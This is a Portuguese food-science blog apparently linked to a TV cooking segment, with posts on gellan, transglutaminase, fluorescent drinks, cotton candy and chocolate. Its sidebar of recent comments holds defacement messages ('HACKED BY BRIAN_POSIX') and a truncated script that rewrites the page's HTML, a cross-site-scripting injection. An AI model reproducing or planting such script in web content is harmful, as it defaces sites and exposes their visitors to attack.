As receitas que se seguem pretendem guiar o leitor na aprendizagem sobre técnicas utilizadas na cozinha moderna, em que são usados novos espessantes e gelificantes. Elas ilustram uma variedade de aplicações destes ingredientes e a sua versatilidade na criação de texturas diferentes menos convencionais.

 

O objetivo é que lhe permita, passo a passo, dominar estas técnicas para que possa usá-las, noutras situações, como apoio à sua criatividade.

 

Seguindo um conjunto de instruções simples, poderá tornar as suas refeições em verdadeiros acontecimentos, através da criação de apontamentos originais.

 

Dê asas à imaginação, surpreenda-se e surpreenda os seus amigos! Surpresa, aventura e emoção, são componentes que podem tornar uma refeição inesquecível…


Tags:

No Mais Mulher desta terça-feira, Joana Moura traz-lhe um convidado muito especial! Paulo barata, um fotografo que se apaixonou pela Food Photography!

 

Há 7 anos, Paulo dá uma reviravolta no focus do seu trabalho quando acompanha a primeira edição do Festival do Vila Joya. Cruza-se com os melhores do mundo no festival e com imensas histórias publicadas na imprensa dedicadas à comida, cria a Guerrilla Food Photography  (http://guerrillafoodphotography.com/) para a qual convida outro fotógrafo e também pós produtor de imagem, o Pedro Nóbrega.


Na Guerrilla tenta alcançar todo o espectro da fotografia de comida, seja estúdio, acção, retratos, reportagens, pratos. Actualmente é colaborador da revista notícias Magazine, Fugas, Volta ao Mundo, Evasões e imprensa internacional.

 

Por isso não perca o Mais Mulher desta terça-feira, e veja algumas das imagens mais emblemáticas do seu trabalho!

Às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




Tags:

Fluorescência é um fenómeno que acontece, quando irradiamos algo que, absorve energia num determinado comprimento de onda e que a emite em forma de luz.

Neste caso em concreto vamos utilizar compostos food grade, que absorvem energia no comprimento de onda da luz negra e a irradiam em forma de luz “fluorescente”, para termos algo divertido e surpreendente, como bebidas fluorescentes.

Estes compostos podem existir em bebidas como a água tónica ou bebidas para desportistas, em que a substância na sua composição que responsável pela fluorescência é o quinino.

Ou podemos adicionar algo, como um produto chamado Glow, um pó de Riboflabina (vitamina B2), que também tem esta característica de ser fluorescente à luz negra.

Onde encontrar este ingrediente e luz negra?


http://inspiringingredients.com/products-page/corantesnaturais/glow-corante-fluorescente-100gr/

 

Não perca esta deliciosa proposta com Joana Moura, Investigadora de Ciências Gastronómicas, que de certo a vai deixar fascinada!

No Mais Mulher desta terça-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




Tags:

O processo de fazer Algodão Doce é bastante simples mas tem ciência.

Nas máquinas específicas para o fazer, o açúcar é submetido a altas temperaturas para ficar no estado líquido e de seguida é projectado por uma estrutura rotativa com um conjunto de orifícios de tamanho muito reduzido.

Assim, quando estes "jactos" finos de açúcar no estado líquido, entram em contacto com o ar mais frio, arrefecem voltando a solidificar, formam emaranhados de microfios.

Cada colher de sopa de açúcar é capaz de formar uma unidade de algodão doce.

Existem muitas formas de se comer este doce, que nos reporta para a infância e que em muitos restaurantes com cozinhas mais vanguardistas, está a ser utilizado em cocktails, pratos e sobremesas.

Onde comprar este equipamento: http://inspiringingredients.com/products-page/equipamentos-profissionais/maquina-de-algodao-doce/

 

Ficou com água na boca!?!

 

Então não perca nesta terça-feira às 17:30 na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 




Tags:

O Gelano é um ingrediente chave em vários pratos produzidos por chefs mais modernos, resultado de uma aproximação racional e baseada na investigação, que deu origem a aplicações interessantes e invulgares deste ingrediente.


O Gelano é um hidrato de carbono utilizado na indústria alimentar e cozinha moderna, como texturante (espessante, gelificante, etc). No mercado doméstico e gourmet, existem vários tipos de gelano disponíveis de marcas diferentes, com características e propriedades também diferentes.
Não é digerido nem absorvido pelo intestino humano, e também não é degradado pelas bactérias do tracto intestinal, comporta-se assim, do ponto de vista nutricional, como uma fibra alimentar. Isto significa que apresenta uma fraca digestibilidade e um valor energético baixo.
                                                                           
O gelano do tipo “F” (marca MBK), é por assim dizer o mais irreverente da linha de gelanos e que permite a realização de resultados mais fantásticos. Tem uma propriedade muito interessante, a de produzir géis fluidos ou líquidos (“gelatinas” que parecem líquidos, mas que na realidade são constituídas por uma rede 3D). Outra propriedade interessante que é a de não se fundir a altas temperaturas, permitindo a confecção de um gelado “flambeado”, cujo exterior fica quente quando incendiado, enquanto que o interior se mantém congelado e frio, mas mantendo sempre a forma.

 

Não perca estas apetitosas novidades no Mais Mulher desta terça-feira, às 17:30, na SIC Mulher!

 

Veja o vídeo aqui!


Tags:

Quando se prepara uma base de gelado, existem dois ingredientes indispensáveis, as gemas de ovos e/ou os estabilizantes. Ambos vão impedir que o preparado à medida que congela, com a ajuda de um movimento constante, não forme grandes cristais de gelo, obtendo-se uma textura suave e cremosa. Mas gelados fofos e suaves, não dão grande trabalho na boca, que tal um gelado que se mastigue? Elástico?

 

Estes gelados nas pastelarias turcas, são normalmente servidos a acompanhar sobremesas típicas.

 

Tal como a massa kadayif que é uma massa fresca de trigo, caracterizada por longos e finos fios. Na Turquia é utilizada principalmente na confecção de doces típicos.

 

No Mais Mulher desta semana vamos explicar-lhe tudo sobre o incrivel mundo das sobremesas Turcas!

 

No Mais Mulher desta quinta-feira, às 17:30 na Sic Mulher!

 

Veja o vídeo aqui!


Tags:

O nosso olfato é o grande responsável pela experiência e pelo gosto. Existem cinco gostos fundamentais que são sentidos na língua.

 

Joana Moura vai fazer uma experiência, com um kit sensorial, para ajudar a explicar esta realidade!

 

Não perca...

 

http://www.tedxfctunl.com/

 

Veja o vídeo aqui!


Tags:

Nesta rubrica vamos falar do chocolate, produto muito apreciado composto essencialmente por cacau e manteiga de cacau. Estes dois ingredientes provêem da semente do cacaueiro – Theobroma cacao, significando Theobroma “alimento dos deuses”, que eram usadas pelos Maias e Astecas para fazerem uma bebida revigorante a que davam o nome de “Xocolatl” (xocoll=amargo e atl=água), precursor do nosso chocolate.

No Congresso europeu de cardiologia de 2011, foi apresentado um trabalho acerca dos efeitos benéficos do chocolate, os quais provêm do cacau na sua mistura, rico em polifenóis. Um consumo diário de chocolate (com pelo menos 70% de cacau) mostrou reduzir o risco cardiovascular em cerca de 30%, bem como melhorar a diabetes.

Os benefícios atribuídos ao chocolate devem-se à presença do cacau na sua composição. Os flavonóides encontrados no cacau (potentes antioxidantes naturais), que segundo alguns estudos é maior que a quantidade encontrada no chá e no vinho, possuem um efeito anti-inflamatório, anti-plaquetário e antioxidante, diminuindo o risco de desenvolver doenças cardiovasculares, contribuindo para o controle da tensão arterial e retardando o envelhecimento, ao combaterem os radicais livres que danificam vários tecidos.

Acresce que o chocolate contém pequenas quantidades de compostos estimulantes como a teobromina (semelhante à cafeína), induz a produção de serotonina, com ligação ao humor, aumentando ainda os níveis de endorfina no cérebro (opiáceo natural) relacionada com a sensação de bem-estar e euforia.


Tags:

Já ouviu falar de "Malto Dextrina"?! Prepare-se para uma viagem saborosa, com Catarina Dias Ferreira e a rubrica "Cozinha com Ciência e Arte"...


Tags:

Nesta rúbrica vamos usar um ingrediente chamado transglutaminase ou mais simpaticamente chamado de Tgase.

A transglutaminase é uma enzima que actua como catalisadora de reacções de ligações entre moléculas de proteína. Este tipo de ligações resultantes da acção desta enzima, são de grande estabilidade e ocorrem entre os aminoácidos glutamina e lisina. Sendo assim, esta transformação actua em todo o tipo de alimentos proteicos (peixe, carne, tofu, gelatinas, farinhas). A TGase é usada na indústria alimentar, no fabrico de enchidos, fiambres, etc.
Actualmente, em cozinha é possível a sua utilização para criações mais ambiciosas, tais como a confecção de um esparguete - 100% camarão, a criação de uma carne mista de vaca e peru, peixe com pele de galinha.... é só preciso imaginação!

 

Delicie-se com a receita do crepe 100 % camarão, na rubrica "Cozinha com Ciência e Arte".


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO